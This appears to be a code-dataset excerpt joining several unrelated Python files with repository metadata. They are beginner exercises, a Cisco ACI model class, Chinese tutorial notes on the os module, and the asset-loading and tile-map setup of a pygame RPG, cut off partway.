14eed02531ce1684bda2ed0b975defced3d7dadd | 1c6a1d8019d303cae94a3bf52f9026dae16ae21d | /exercise1.py | e0f16144fdb6823399f142259bc31ed52a112ab4 | [] | no_license | C4DLabOrg/ca-training | 1f4e8ec4a21d8ba43783684924eead7abc766459 | 24b0b81678630d659c7ea9f7128049976b4ee9c4 | refs/heads/master | 2020-06-10T20:17:33.385543 | 2016-12-08T00:22:25 | 2016-12-08T00:22:25 | 75,886,994 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 706 | py | '''
- Create a function that picks two inputs from a user
- Create a function that finds the difference between the two values.
- Create a function that prints the result
'''
#picks inputs from a user
def getInput():
    """Prompt for two integers (Python 2 raw_input) and return them as a tuple."""
    input1 = int(raw_input('Enter 1st value\n'))
    input2 = int(raw_input('Enter 2nd value\n'))
    return input1, input2
#gets the difference
def getDifference(var1, var2):
    """Return var1 minus var2."""
    return var1 - var2
#output results
def output(var):
    """Print the result in a sentence (Python 2 print statement)."""
    print 'The result is ',var
#execute the code: read two values, subtract, and print the result
inputs = getInput()
#accessing variables in a tuple
#print inputs[0]
#print inputs[1]
#call function to do the difference
answer = getDifference(inputs[0], inputs[1])
output(answer)
| [
"shimanyi@sisitech.com"
] | shimanyi@sisitech.com |
5f7a6e0094d7dff4e2a88f1833c2b9afbec85264 | 24fe1f54fee3a3df952ca26cce839cc18124357a | /servicegraph/lib/python2.7/site-packages/acimodel-4.0_3d-py2.7.egg/cobra/modelimpl/rtdmc/ajpfilterpol.py | 2d8941c96e207a74adc8b90ad0b1cdbcb211fabc | [] | no_license | aperiyed/servicegraph-cloudcenter | 4b8dc9e776f6814cf07fe966fbd4a3481d0f45ff | 9eb7975f2f6835e1c0528563a771526896306392 | refs/heads/master | 2023-05-10T17:27:18.022381 | 2020-01-20T09:18:28 | 2020-01-20T09:18:28 | 235,065,676 | 0 | 0 | null | 2023-05-01T21:19:14 | 2020-01-20T09:36:37 | Python | UTF-8 | Python | false | false | 4,481 | py | # coding=UTF-8
# **********************************************************************
# Copyright (c) 2013-2019 Cisco Systems, Inc. All rights reserved
# written by zen warriors, do not modify!
# **********************************************************************
from cobra.mit.meta import ClassMeta
from cobra.mit.meta import StatsClassMeta
from cobra.mit.meta import CounterMeta
from cobra.mit.meta import PropMeta
from cobra.mit.meta import Category
from cobra.mit.meta import SourceRelationMeta
from cobra.mit.meta import NamedSourceRelationMeta
from cobra.mit.meta import TargetRelationMeta
from cobra.mit.meta import DeploymentPathMeta, DeploymentCategory
from cobra.model.category import MoCategory, PropCategory, CounterCategory
from cobra.mit.mo import Mo
# ##################################################
class AJPFilterPol(Mo):
meta = ClassMeta("cobra.model.rtdmc.AJPFilterPol")
meta.isAbstract = True
meta.moClassName = "rtdmcAJPFilterPol"
meta.moClassName = "rtdmcAJPFilterPol"
meta.rnFormat = ""
meta.category = MoCategory.REGULAR
meta.label = "Abstract JP Filter Policy"
meta.writeAccessMask = 0x20000001
meta.readAccessMask = 0x20000001
meta.isDomainable = False
meta.isReadOnly = False
meta.isConfigurable = True
meta.isDeletable = True
meta.isContextRoot = False
meta.childClasses.add("cobra.model.rtdmc.RsFilterToRtMapPol")
meta.childClasses.add("cobra.model.pim.RouteMapDef")
meta.childClasses.add("cobra.model.fault.Delegate")
meta.childNamesAndRnPrefix.append(("cobra.model.rtdmc.RsFilterToRtMapPol", "rsfilterToRtMapPol"))
meta.childNamesAndRnPrefix.append(("cobra.model.pim.RouteMapDef", "rtmapdef"))
meta.childNamesAndRnPrefix.append(("cobra.model.fault.Delegate", "fd-"))
meta.superClasses.add("cobra.model.pol.Comp")
meta.superClasses.add("cobra.model.naming.NamedObject")
meta.superClasses.add("cobra.model.pol.Obj")
meta.superClasses.add("cobra.model.rtdmc.AFilterPol")
meta.concreteSubClasses.add("cobra.model.pim.JPOutbFilterDef")
meta.concreteSubClasses.add("cobra.model.pim.JPInbFilterPol")
meta.concreteSubClasses.add("cobra.model.pim.JPInbFilterDef")
meta.concreteSubClasses.add("cobra.model.pim.JPOutbFilterPol")
meta.rnPrefixes = [
]
prop = PropMeta("str", "childAction", "childAction", 4, PropCategory.CHILD_ACTION)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("deleteAll", "deleteall", 16384)
prop._addConstant("deleteNonPresent", "deletenonpresent", 8192)
prop._addConstant("ignore", "ignore", 4096)
meta.props.add("childAction", prop)
prop = PropMeta("str", "descr", "descr", 5582, PropCategory.REGULAR)
prop.label = "Description"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 128)]
prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
meta.props.add("descr", prop)
prop = PropMeta("str", "dn", "dn", 1, PropCategory.DN)
prop.label = "None"
prop.isDn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("dn", prop)
prop = PropMeta("str", "name", "name", 4991, PropCategory.REGULAR)
prop.label = "Name"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 64)]
prop.regex = ['[a-zA-Z0-9_.:-]+']
meta.props.add("name", prop)
prop = PropMeta("str", "nameAlias", "nameAlias", 28417, PropCategory.REGULAR)
prop.label = "Name alias"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 63)]
prop.regex = ['[a-zA-Z0-9_.-]+']
meta.props.add("nameAlias", prop)
prop = PropMeta("str", "rn", "rn", 2, PropCategory.RN)
prop.label = "None"
prop.isRn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("rn", prop)
prop = PropMeta("str", "status", "status", 3, PropCategory.STATUS)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("created", "created", 2)
prop._addConstant("deleted", "deleted", 8)
prop._addConstant("modified", "modified", 4)
meta.props.add("status", prop)
def __init__(self, parentMoOrDn, markDirty=True, **creationProps):
namingVals = []
Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps)
# End of package file
# ##################################################
| [
"rrishike@cisco.com"
] | rrishike@cisco.com |
e2a0d3c0ad23256cde4b53012bff5b0474c41b96 | 56014da6ebc817dcb3b7a136df8b11cf9f976d93 | /Python基础笔记/05-读写文件及办公文档自动化/05.04-OS模块.py | 09d813dea42521efecdd3acd34a51b2e3b7f6223 | [] | no_license | sunday2146/notes-python | 52b2441c981c1106e70a94b999e986999334239a | e19d2aee1aa9433598ac3c0a2a73b0c1e8fa6dc2 | refs/heads/master | 2022-01-12T22:55:45.401326 | 2019-01-18T03:18:26 | 2019-01-18T03:18:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,945 | py | import os
"""
os:包含了普遍的操作系统的功能
"""
#nt---windows系统 posix---linux,Unix或Mac OS X
#获取操作系统 类型
print(os.name)
#print(os.unname)--打印操作系统详细的信息,windows不支持
#获取操作系统中的环境变量
print(os.environ)
#获取指定环境变量
print(os.environ.get("appdata"))
#获得当前目录 ./a/
print(os.curdir)
#获取当前工作目录,即当前python脚本所在的目录
print(os.getcwd())
#以列表的形式返回指定目录下所有文件
print(os.listdir(r"C:\Users\Zhangyadi\Desktop"))
#在当前目录下创建新目录
#os.mkdir("sunck")
#删除目录
#os.rmdir("sunck")
#获取文件属性
#print(os.stat("sunck"))
#重命名
#os.rename("sunck","kaige")
#删除普通文件
#os.remove("hello.py.txt")
#运行shell命令---记事本
#os.system("notepad")
#os.system("write")-写字板
#os.system("mspaint")--画板
#os.system("shutdown-s-t 500")-自动关机
#os.system("shutdown-a")-取消
#os.system("taskkill/f /im notepad.exe")--关闭
#有些方法存在os模块里,还有写存在与os.path
#查看当前的绝对路径
print(os.path.abspath("kaige"))
#拼接路径
p1 = r"C:\Users\Zhangyadi\Desktop\project"
p2 = "sunck"
#注意:参数2里开始不要有斜杠\
#C:\Users\Zhangyadi\Desktop\project\sunck
print(os.path.join(p1,p2))
p3 = "/root/sunck/home"
p4 = "kaige"
print(os.path.join(p3,p4))
#拆分路径
path2 = r"C:\Users\Zhangyadi\Desktop\project\kaige"
print(os.path.split(path2))
#获取扩展名
print(os.path.splitext(path2))
#判断是否是目录
print(os.path.isdir(path2))
#判断文件是否存在
path3 = r"C:\Users\Zhangyadi\Desktop\56fil6.txt"
print(os.path.isfile(path3))
#判断目录是否存在
print(os.path.exists(path2))
#获得文件大小(字节)
print(os.path.getsize(path3))
#获得文件的目录
print(os.path.dirname(path3))
print(os.path.basename(path3))#获取文件名
| [
"964640116@qq.com"
] | 964640116@qq.com |
0314c8610b8ccf139a6fed7f42ab96ba9070709b | 70e80be09205be201099ce0826f32b5a27576dde | /Python/Exercises/even_num.py | 452a8a5a68a55b0e36d63ef33549bcb2ec08147e | [] | no_license | gitlearn212/My-Python-Lab | 9677e44ffe0e4b2d6db288dd37e6ed81a5bf8550 | c5bb63075d9b4ab7112bb001cb90f912ff184106 | refs/heads/master | 2020-04-14T09:07:42.046945 | 2020-01-31T09:06:13 | 2020-01-31T09:06:13 | 163,752,419 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 425 | py | '''
Using the given list 'a' , write a list that has only even numbers
Try this with for loop and write a code in one line
'''
a = [1, 4, 9, 16, 25, 36, 49, 64, 81, 100]
# <=========== ONE LINE CODE ============>
# b = [element for element in a if element % 2 == 0]
# print(b)
# <========== FOR LOOP =================>
for i in list((a)):
if i % 2 == 0:
print(i)
b = [lis for lis in a if lis % 2 == 0]
print(b)
| [
"gitlearn212@gmail.com"
] | gitlearn212@gmail.com |
031d47d65681d2af1a9fcbc184a908a52afe9323 | ff5b9f963e4e60e82113514f53d1d79db6b95e66 | /Dragon-Slayer.py | f390f513a2f7cf39be2f52ca55289978b878fa38 | [] | no_license | logiczsniper/Dragon-Slayer-V3 | 8e85c2470f9e235e77e93df27cd39bcfa88eb8f5 | c6261777e848b263708b964b6745844019eab4c4 | refs/heads/master | 2021-05-05T23:06:46.976224 | 2018-12-24T17:04:48 | 2018-12-24T17:04:48 | 116,586,552 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 120,551 | py | """
Logan Czernel
Project used to learn Python.
"""
#Imports
import pygame as pg, sys
import time
import random
import threading
#Activate Pygame
pg.init()
#Useful definitions
tile_size = 80  # pixel size of one square map tile
MAPWIDTH = 14   # map size in tiles: 14 columns ...
MAPHEIGHT = 11  # ... by 11 rows
smallText = pg.font.Font('PressStart2P.ttf', 17)   # same typeface at three sizes
largeText = pg.font.Font('PressStart2P.ttf', 55)
mediumText = pg.font.Font('PressStart2P.ttf', 36)
GAMEDISPLAY = pg.display.set_mode((MAPWIDTH * tile_size, MAPHEIGHT * tile_size))  # 1120x880 window
event = pg.event.poll()  # NOTE(review): polls a single event once at import time; looks unused - confirm
clock = pg.time.Clock()  # frame-rate clock (FPS below is the intended cap)
FPS = 22
#Groups
# One pygame sprite Group per entity category. Grouping presumably drives
# per-category update/draw/collision checks later in the file - the
# membership of each group is established elsewhere.
all_sprites = pg.sprite.Group()
walls = pg.sprite.Group()
bats = pg.sprite.Group()
slimes = pg.sprite.Group()
character = pg.sprite.Group()
bullets = pg.sprite.Group()
friendly_one = pg.sprite.Group()
friendly_two = pg.sprite.Group()
deers = pg.sprite.Group()
wolves = pg.sprite.Group()
dragons = pg.sprite.Group()
fireballs = pg.sprite.Group()
starterdragon = pg.sprite.Group()
health = pg.sprite.Group()
healthbox = pg.sprite.Group()
scorpions = pg.sprite.Group()
clouds = pg.sprite.Group()
coins = pg.sprite.Group()
doors = pg.sprite.Group()
friendly_three = pg.sprite.Group()
friendly_four = pg.sprite.Group()
desert_flower = pg.sprite.Group()
shop_keeper = pg.sprite.Group()
health_pots = pg.sprite.Group()
shovels = pg.sprite.Group()
dragonhealth = pg.sprite.Group()
pause = False
death = False
victory = False
controls = False
#Basic Widths + Heights
display_width = 1120
display_height = 880
#Colours
black = (0, 0, 0)
gray = (50, 50, 50)
blue = (0, 206, 209)
hoverblue = (95, 158, 160)
royalblue = (0, 78, 204)
healthred = (175, 14, 14)
truegray = (127, 132, 140)
cream = (35, 36, 45)
#Image Loader
def load_image(name, extension='.png'):
    """Load an image from the Images/ directory, ready for blitting.

    Args:
        name: file path relative to Images/, WITHOUT its extension
            (may include a subfolder, e.g. 'Sprites/deer').
        extension: file extension including the leading dot. Defaults to
            '.png', which every existing call in this file relies on.

    Returns:
        A pygame.Surface converted with convert_alpha() so per-pixel
        transparency is preserved and blits are fast.
    """
    return pg.image.load('Images/' + name + extension).convert_alpha()
#Health Images - HUD bars/containers for the player and the dragon, plus the upgrade pickup
healthstatus = load_image('healthbar')
healthcontainer = load_image('healthcontainer')
healthboximg = load_image('healthupgrade')
dragonstatus = load_image('dragonhealthbar')
dragoncontainer = load_image('dragonhealthcontainer')
#Item Images - static pickup/inventory icons
coin_still = load_image('coin_icon')
potion_still = load_image('potion')
flowerimg = load_image('flower')
shovelimg = load_image('shovel')
#Animation Images - sprite sheets and frames for the player, mobs and effects
characterssheet = load_image('Sprites/spritesheet')
magic = load_image('magic')
magictwo = load_image('magictwo')
fire = load_image('fireball')
standingsprite = load_image('standingsprite')
walkingsprite = load_image('Sprites/walkingsprite')
mobsprite = load_image('Sprites/batsprite')
slime = load_image('Sprites/slimesheet')
deer = load_image('Sprites/deer')
wolf = load_image('Sprites/wolf')
dragon = load_image('Sprites/dragonspritesheet')
mobhit = load_image('mobhit')
scorpion = load_image('Sprites/scorpionsprite')
coin_sheet = load_image('Sprites/coin_gold')
walkingtwosprite = load_image('Sprites/walkertwo')
standertwo = load_image('Sprites/standertwo')
standerbrother = load_image('Sprites/sickbrother')
shopimg = load_image('Sprites/shopkeeper')
#Cloud Images + Cloud Lists
# Three cloud variants (d/l/s prefixes), four frames each; the per-variant
# lists below keep the frames in order for animation/random choice.
dOne = load_image('Clouds/dOne')
dTwo = load_image('Clouds/dTwo')
dThree = load_image('Clouds/dThree')
dFour = load_image('Clouds/dFour')
lOne = load_image('Clouds/lOne')
lTwo = load_image('Clouds/lTwo')
lThree = load_image('Clouds/lThree')
lFour = load_image('Clouds/lFour')
sOne = load_image('Clouds/sOne')
sTwo = load_image('Clouds/sTwo')
sThree = load_image('Clouds/sThree')
sFour = load_image('Clouds/sFour')
sclouds = [sOne, sTwo, sThree, sFour]
lclouds = [lOne, lTwo, lThree, lFour]
dclouds = [dOne, dTwo, dThree, dFour]
#Smoke Images - six-frame smoke animation, kept in play order.
# (A redundant module-level 'global smoke' statement was removed: 'global'
# is a no-op at module scope.)
smokeone = load_image('smokeone')
smoketwo = load_image('smoketwo')
smokethree = load_image('smokethree')
smokefour = load_image('smokefour')
smokefive = load_image('smokefive')
smokesix = load_image('smokesix')
smoke = [smokeone, smoketwo, smokethree, smokefour, smokefive, smokesix]
#Intro Images - stills used by the intro sequence (dragon poses, doors, characters)
dragonstand = load_image('dragonstanding')
dragonhalf = load_image('dragonhalf')
dragonclosed = load_image('dragonclosed')
dragonopen = load_image('dragonopen')
son = load_image('son')
doorone = load_image('doorone')
doortwo = load_image('doortwo')
doorthree = load_image('doorthree')
doorfour = load_image('doorfour')
mage = load_image('mage')
firstpicture = load_image('firstpicture')
holdwand = load_image('holdwand')
standingspritetwo = load_image('standingspriteclosedeyes')
#Background Images - full-screen backdrops (start, victory, death, scroll overlay)
bgstart = load_image('bgstart')
trophy = load_image('trophy')
deathimg = load_image('death')
scroll = load_image('scroll')
#TileMap Images
# One Surface per terrain tile; each is mapped to an integer ID in the
# `tiles` dict below and referenced by the tilemap grids at the bottom
# of this section.
LONGGRASS = load_image('grassytile')
STUMP = load_image('stumptile')
CAVEFLOOR = load_image('cavefloor')
PATHONE = load_image('Paths/horizontalpath')
PATHTWO = load_image('Paths/pathintersection')
PATHTHREE = load_image('Paths/verticalpath')
PATHFOUR = load_image('Paths/downintersection')
PATHFIVE = load_image('Paths/endtile')
PATHSIX = load_image('Paths/leftintersection')
PATHSEVEN = load_image('Paths/leftuppath')
PATHEIGHT = load_image('Paths/upintersection')
PATHNINE = load_image('Paths/uprightpath')
PATHTEN = load_image('Paths/downrightpath')
PATHELEVEN = load_image('Paths/rightintersection')
PATHTWELVE = load_image('Paths/tiles')
CAVEWALL = load_image('cavewall')
CAVEROCK = load_image('caverock')
WATER = load_image('Water/watertile')
WATERTWO = load_image('Water/waterbottom')
WATERTHREE = load_image('Water/waterleft')
WATERFOUR = load_image('Water/waterright')
WATERFIVE = load_image('Water/waterbottomleftright')
WATERSIX = load_image('Water/waterbottomright')
WATERSEVEN = load_image('Water/waterbottomtopright')
WATEREIGHT = load_image('Water/waterleftbottom')
WATERNINE = load_image('Water/waterlefttop')
WATERTEN = load_image('Water/waterlefttopbottom')
WATERELEVEN = load_image('Water/watertop')
WATERTWELVE = load_image('Water/watertopright')
WATERTHIRTEEN = load_image('Water/waterleftright')
BRIDGE = load_image('Water/bridgetile')
GRASS = load_image('grasstile')
HOUSE = load_image('housetile')
ROCK = load_image('rocktile')
ROCKTWO = load_image('rocktiletwo')
TREE = load_image('treetile')
STAIR = load_image('staircasetile')
CAVESTAIR = load_image('cavestair')
DARKTILE = load_image('darktile')
DARKTOP = load_image('darktop')
DARKLEFT = load_image('darkleft')
DARKRIGHT = load_image('darkright')
CAVEROCKTWO = load_image('caverocktwo')
CAVEWALLTWO = load_image('cavewalltwo')
SAND = load_image('sandtile')
SANDROCKS = load_image('sandrocks')
SANDSHROOMONE = load_image('sandshroomone')
SANDSHROOMTWO = load_image('sandshroomtwo')
SANDSHROOMTHREE = load_image('sandshroomthree')
SNOW = load_image('snowtile')
SNOWTWO = load_image('snowtwo')
SNOWTHREE = load_image('snowthree')
SNOWTREE = load_image('snowtree')
SNOWROCK = load_image('snowrock')
SNOWTRUNK = load_image('snowtrunk')
SNOWFOUR = load_image('snowfour')
SANDX = load_image('sandXtile')
HOUSETWO = load_image('housetwotile')
INDOORDARK = load_image('Indoor/housedark')
WALLTOPRIGHT = load_image('Indoor/toprightcorner')
WALLTOPLEFT = load_image('Indoor/topleftcorner')
WALLBOTTOMLEFT = load_image('Indoor/bottomleftcorner')
WALLBOTTOMRIGHT = load_image('Indoor/bottomrightcorner')
WALLRIGHT = load_image('Indoor/rightwall')
WALLLEFT = load_image('Indoor/leftwall')
WALLTOP = load_image('Indoor/topwall')
WALLBOTTOM = load_image('Indoor/bottomwall')
FLOORBASIC = load_image('Indoor/floor')
FLOORWALL = load_image('Indoor/floortop')
CHAIRONE = load_image('Indoor/chair')
CHAIRTWO = load_image('Indoor/floorchair')
BED = load_image('Indoor/bed')
MOUNTEDWALL = load_image('Indoor/mountedwall')
BOOKWALL = load_image('Indoor/bookwall')
EXIT = load_image('Indoor/exit')
TABLE = load_image('Indoor/table')
# Sound loader
def load_sound(name):
    """Return a pygame Sound loaded from the Sounds/ directory.

    Unlike load_image, *name* must include its file extension
    (e.g. 'bat.ogg').
    """
    return pg.mixer.Sound('Sounds/' + name)
#Songs
# Background-music track paths (played via pg.mixer.music elsewhere).
# (Two redundant module-level 'global' statements were removed from this
# section: 'global' is a no-op at module scope.)
songs = ['Sounds/Adventure_Meme.ogg', 'Sounds/accident.ogg', 'Sounds/jatatap.ogg', 'Sounds/zizibum.ogg', 'Sounds/cave.ogg', 'Sounds/introsong.ogg']
pg.mixer.music.set_volume(0.215)
#Sound Effects
batsound = load_sound('bat.ogg')
buttonsound = load_sound('buttonsound.wav')
buttonhoversound = load_sound('overbuttonsound.wav')
deathsound = load_sound('death2.ogg')
deersound = load_sound('deer.ogg')
dragonsound = load_sound('dragon.ogg')
magicsound = load_sound('magicsound.wav')
slimesound = load_sound('slime.ogg')
walkingsound = load_sound('walkingsound.wav')
walkingtwosound = load_sound('walkingtwosound.wav')
wolfsound = load_sound('wolf.ogg')
hitsound = load_sound('hitsound.wav')
pauseinsound = load_sound('pausein.wav')
pauseoutsound = load_sound('pauseout.wav')
upgradesound = load_sound('healthsound.wav')
playerhitsound = load_sound('playerdmgsound.wav')
scorpionsound = load_sound('desertmob.wav')
coin_sound = load_sound('coin.wav')
stairsound = load_sound('stairsound.wav')
introdoor = load_sound('firstdoor.wav')
doorsound = load_sound('door.wav')
#Volume for Sound Effects
# Per-effect volumes in [0.0, 1.0]; effects not listed keep the default.
walkingsound.set_volume(0.04)
walkingtwosound.set_volume(0.05)
buttonsound.set_volume(0.13)
buttonhoversound.set_volume(0.15)
magicsound.set_volume(0.15)
pauseinsound.set_volume(0.85)
pauseoutsound.set_volume(0.85)
upgradesound.set_volume(0.9)
playerhitsound.set_volume(0.2)
hitsound.set_volume(0.2)
#Tile association numbers
# Integer IDs for each tile type. These IDs are the keys of the `tiles`
# dict below and the values placed in the tilemap grids, so their numeric
# values must not change.
LLONGGRASS = 0
SSTUMP = 1
CCAVEFLOOR = 2
CCAVEWALL = 3
CCAVEROCK = 4
BWATER = 5
GGRASS = 6
BHOUSE = 7
BROCK = 8
GTREE = 9
DSTAIR = 10
PPATHONE = 11
PPATHTWO = 12
PPATHTHREE = 13
WWATERTWO = 14
WWATERTHREE = 15
WWATERFOUR = 16
WWATERFIVE = 17
RROCKTWO = 18
PPATHFOUR = 19
PPATHFIVE = 20
PPATHSIX = 21
PPATHSEVEN = 22
PPATHEIGHT = 23
PPATHNINE = 24
PPATHTEN = 25
WWATERSIX = 26
WWATERSEVEN = 27
WWATEREIGHT = 28
WWATERNINE = 29
BBRIDGE = 30
WWATERTEN = 31
WWATERELEVEN = 32
WWATERTWELVE = 33
WWATERTHIRTEEN = 34
CCAVESTAIR = 35
DDARKTILE = 36
DDARKTOP = 37
DDARKLEFT = 38
DDARKRIGHT = 39
CCAVEROCKTWO = 40
CCAVEWALLTWO = 41
SSAND = 42
SSNOW = 43
SSANDSHROOMONE = 44
SSANDSHROOMTWO = 45
SSANDSHROOMTHREE = 46
SSANDROCKS = 47
SSNOWTWO = 48
SSNOWTHREE = 49
SSNOWTREE = 50
SSNOWROCK = 51
SSNOWTRUNK = 52
SSNOWFOUR = 53
PPATHELEVEN = 54
PPATHTWELVE = 55
SSANDX = 56
HHOUSETWO = 57
IINDOORDARK = 58
WWALLTOPRIGHT = 59
WWALLTOPLEFT = 60
WWALLBOTTOMLEFT = 61
WWALLBOTTOMRIGHT = 62
WWALLRIGHT = 63
WWALLLEFT = 64
WWALLTOP = 65
WWALLBOTTOM = 66
FFLOORBASIC = 67
FFLOORWALL = 68
CCHAIRONE = 69
CCHAIRTWO = 70
BBED = 71
MMOUNTEDWALL = 72
BBOOKWALL = 73
EEXIT = 74
TTABLE = 75
#All Tiles
# Lookup table: tile ID (int constant) -> tile image (pygame.Surface).
# IDs happen to run 0..75 with no gaps; the dict keeps the mapping explicit.
tiles = {
    LLONGGRASS : LONGGRASS,
    SSTUMP : STUMP,
    CCAVEFLOOR : CAVEFLOOR,
    CCAVEWALL : CAVEWALL,
    CCAVEROCK : CAVEROCK,
    BWATER : WATER,
    GGRASS : GRASS,
    BHOUSE : HOUSE,
    BROCK : ROCK,
    GTREE : TREE,
    DSTAIR : STAIR,
    PPATHONE : PATHONE,
    PPATHTWO : PATHTWO,
    PPATHTHREE : PATHTHREE,
    WWATERTWO : WATERTWO,
    WWATERTHREE : WATERTHREE,
    WWATERFOUR : WATERFOUR,
    WWATERFIVE : WATERFIVE,
    RROCKTWO : ROCKTWO,
    PPATHFOUR : PATHFOUR,
    PPATHFIVE : PATHFIVE,
    PPATHSIX : PATHSIX,
    PPATHSEVEN : PATHSEVEN,
    PPATHEIGHT : PATHEIGHT,
    PPATHNINE : PATHNINE,
    PPATHTEN : PATHTEN,
    WWATERSIX : WATERSIX,
    WWATERSEVEN : WATERSEVEN,
    WWATEREIGHT : WATEREIGHT,
    WWATERNINE : WATERNINE,
    BBRIDGE : BRIDGE,
    WWATERTEN : WATERTEN,
    WWATERELEVEN : WATERELEVEN,
    WWATERTWELVE : WATERTWELVE,
    WWATERTHIRTEEN : WATERTHIRTEEN,
    CCAVESTAIR : CAVESTAIR,
    DDARKTILE : DARKTILE,
    DDARKTOP : DARKTOP,
    DDARKLEFT : DARKLEFT,
    DDARKRIGHT : DARKRIGHT,
    CCAVEROCKTWO : CAVEROCKTWO,
    CCAVEWALLTWO : CAVEWALLTWO,
    SSAND : SAND,
    SSNOW : SNOW,
    SSANDSHROOMONE : SANDSHROOMONE,
    SSANDSHROOMTWO : SANDSHROOMTWO,
    SSANDSHROOMTHREE : SANDSHROOMTHREE,
    SSANDROCKS : SANDROCKS,
    SSNOWTWO : SNOWTWO,
    SSNOWTHREE : SNOWTHREE,
    SSNOWTREE : SNOWTREE,
    SSNOWROCK : SNOWROCK,
    SSNOWTRUNK : SNOWTRUNK,
    SSNOWFOUR : SNOWFOUR,
    PPATHELEVEN : PATHELEVEN,
    PPATHTWELVE : PATHTWELVE,
    SSANDX : SANDX,
    HHOUSETWO : HOUSETWO,
    IINDOORDARK : INDOORDARK,
    WWALLTOPRIGHT : WALLTOPRIGHT,
    WWALLTOPLEFT : WALLTOPLEFT,
    WWALLBOTTOMLEFT : WALLBOTTOMLEFT,
    WWALLBOTTOMRIGHT : WALLBOTTOMRIGHT,
    WWALLRIGHT : WALLRIGHT,
    WWALLLEFT : WALLLEFT,
    WWALLTOP : WALLTOP,
    WWALLBOTTOM : WALLBOTTOM,
    FFLOORBASIC : FLOORBASIC,
    FFLOORWALL : FLOORWALL,
    CCHAIRONE : CHAIRONE,
    CCHAIRTWO : CHAIRTWO,
    BBED : BED,
    MMOUNTEDWALL : MOUNTEDWALL,
    BBOOKWALL : BOOKWALL,
    EEXIT : EXIT,
    TTABLE : TABLE
    }
#First Map - grid of tile-ID constants indexed [row][column] (village with paths/houses)
tilemapone = [
    [GTREE, WWATERTHREE, BWATER, WWATERFOUR, GTREE, RROCKTWO, PPATHTHREE, BROCK, GTREE, RROCKTWO, GTREE, BROCK, RROCKTWO, RROCKTWO],
    [WWATERNINE, BWATER, BWATER, BWATER, WWATERSEVEN, GGRASS, PPATHNINE, PPATHTWELVE, SSTUMP, GTREE, GGRASS, GTREE, SSTUMP, BROCK],
    [WWATEREIGHT, BWATER, WWATERTWO, WWATERSIX, LLONGGRASS, GGRASS, HHOUSETWO, PPATHTHREE, GGRASS, LLONGGRASS, GGRASS, LLONGGRASS, GTREE, BROCK],
    [RROCKTWO, WWATERFIVE, SSTUMP, GGRASS, GTREE, GGRASS, PPATHNINE, PPATHSIX, LLONGGRASS, SSTUMP, GGRASS, HHOUSETWO, LLONGGRASS, RROCKTWO],
    [GGRASS, LLONGGRASS, BHOUSE, LLONGGRASS, GGRASS, GTREE, LLONGGRASS, PPATHTHREE, RROCKTWO, GGRASS, LLONGGRASS, PPATHTHREE, BROCK, LLONGGRASS],
    [PPATHONE, PPATHONE, PPATHEIGHT, PPATHONE, PPATHFOUR, PPATHONE, PPATHONE, PPATHTWO, PPATHONE, PPATHONE, PPATHFOUR, PPATHEIGHT, PPATHONE, PPATHONE],
    [LLONGGRASS, GGRASS, SSTUMP, HHOUSETWO, PPATHTHREE, GGRASS, LLONGGRASS, PPATHTHREE, GTREE, LLONGGRASS, PPATHTHREE, GGRASS, LLONGGRASS, GGRASS],
    [RROCKTWO, GTREE, LLONGGRASS, PPATHNINE, PPATHSEVEN, SSTUMP, GGRASS, PPATHTHREE, GGRASS, GGRASS, PPATHTHREE, BHOUSE, GTREE, GTREE],
    [BROCK, BROCK, GTREE, GGRASS, LLONGGRASS, GGRASS, GGRASS, PPATHTHREE, GGRASS, LLONGGRASS, PPATHNINE, PPATHSEVEN, GGRASS, GTREE],
    [BROCK, BROCK, RROCKTWO, LLONGGRASS, GGRASS, GTREE, GTREE, PPATHTHREE, GGRASS, GTREE, LLONGGRASS, GGRASS, LLONGGRASS, RROCKTWO],
    [RROCKTWO, BROCK, BROCK, RROCKTWO, GTREE, GTREE, GGRASS, PPATHTHREE, GTREE, GGRASS, GTREE, RROCKTWO, BROCK, BROCK]
    ]
#Second Map - grid of tile-ID constants indexed [row][column] (grass/water area with bridge and stair)
tilemaptwo = [
    [GTREE, BROCK, WWATERTEN, WWATERELEVEN, WWATERELEVEN, WWATERTWELVE, GGRASS, GTREE, RROCKTWO, GTREE, BROCK, GTREE, RROCKTWO, BROCK],
    [RROCKTWO, GTREE, GTREE, WWATERTHREE, BWATER, WWATERSIX, GTREE, GGRASS, LLONGGRASS, GGRASS, GGRASS, LLONGGRASS, BROCK, BROCK],
    [RROCKTWO, GTREE, GGRASS, WWATEREIGHT, WWATERFOUR, GGRASS, LLONGGRASS, GGRASS, GGRASS, GGRASS, BROCK, GGRASS, GGRASS, RROCKTWO],
    [GTREE, LLONGGRASS, GGRASS, GGRASS, BBRIDGE, GGRASS, GGRASS, GGRASS, LLONGGRASS, GGRASS, GGRASS, GGRASS, RROCKTWO, GTREE],
    [RROCKTWO, GGRASS, GGRASS, GGRASS, WWATERTHIRTEEN, GGRASS, GGRASS, GGRASS, GTREE, GGRASS, RROCKTWO, LLONGGRASS, BROCK, GTREE],
    [GTREE, LLONGGRASS, GGRASS, WWATERNINE, WWATERFOUR, GGRASS, GGRASS, GGRASS, GGRASS, GGRASS, GGRASS, GGRASS, GGRASS, GTREE],
    [DSTAIR, GGRASS, GGRASS, WWATERTHREE, WWATERFOUR, GGRASS, GTREE, GGRASS, GGRASS, GGRASS, GTREE, GGRASS, GTREE, GGRASS],
    [RROCKTWO, GTREE, WWATERNINE, BWATER, WWATERSIX, GGRASS, GGRASS, GGRASS, GGRASS, LLONGGRASS, GGRASS, BROCK, GGRASS, BROCK],
    [BROCK, GTREE, WWATERTHREE, WWATERSIX, GGRASS, GTREE, GGRASS, LLONGGRASS, GGRASS, GGRASS, GGRASS, BROCK, LLONGGRASS, GTREE],
